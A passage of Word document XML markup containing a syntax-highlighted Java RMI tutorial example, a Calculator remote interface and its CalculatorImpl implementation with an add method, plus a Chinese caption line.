      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cal</w:t>
      </w:r>
      <w:r>
        <w:t>culator.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D415CAB" w14:textId="77777777" w:rsidR="00AD5F3E" w:rsidRDefault="00AD5F3E" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>org.example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.rmi.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Remote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.rmi.RemoteException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public interface </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Calculator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">extends </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="41A1C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">a, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">throws </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RemoteException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CA74C8" w14:textId="77777777" w:rsidR="000B4FF4" w:rsidRPr="00AD5F3E" w:rsidRDefault="000B4FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E55916" w14:textId="67301C58" w:rsidR="000B4FF4" w:rsidRDefault="004E3BA6" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004E3BA6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现远程接口的远程对象（例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3BA6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CalculatorImpl.java</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3BA6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B21A4DF" w14:textId="77777777" w:rsidR="00FA7AB5" w:rsidRDefault="00FA7AB5" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.rmi.RemoteException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.rmi.server.UnicastRemoteObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CalculatorImpl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">extends </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">UnicastRemoteObject </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">implements </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Calculator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">protected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="41A1C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CalculatorImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">throws </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">RemoteException </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="41A1C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">a, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">throws </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">RemoteException </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a + b;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
